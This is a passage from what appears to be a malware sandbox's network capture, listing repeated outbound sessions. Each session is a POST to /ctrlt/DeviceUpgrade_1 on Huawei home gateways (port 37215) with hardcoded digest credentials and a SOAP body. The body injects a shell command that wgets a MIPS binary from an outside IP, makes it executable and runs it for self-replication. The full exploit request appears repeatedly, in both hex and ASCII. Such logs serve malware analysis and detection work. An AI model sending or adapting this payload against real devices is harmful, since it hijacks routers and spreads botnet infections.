                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2220192.168.2.134981841.232.177.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.739168882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2221192.168.2.134942041.87.98.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.739626884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2222192.168.2.1344814157.18.206.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.739638090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2223192.168.2.1357896157.17.192.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.739675045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2224192.168.2.1351590197.43.102.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.740061998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2225192.168.2.1342424157.231.233.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.740102053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2226192.168.2.134307041.139.174.14537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.740657091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042681932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522636890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2227192.168.2.134483641.236.168.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.741677999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
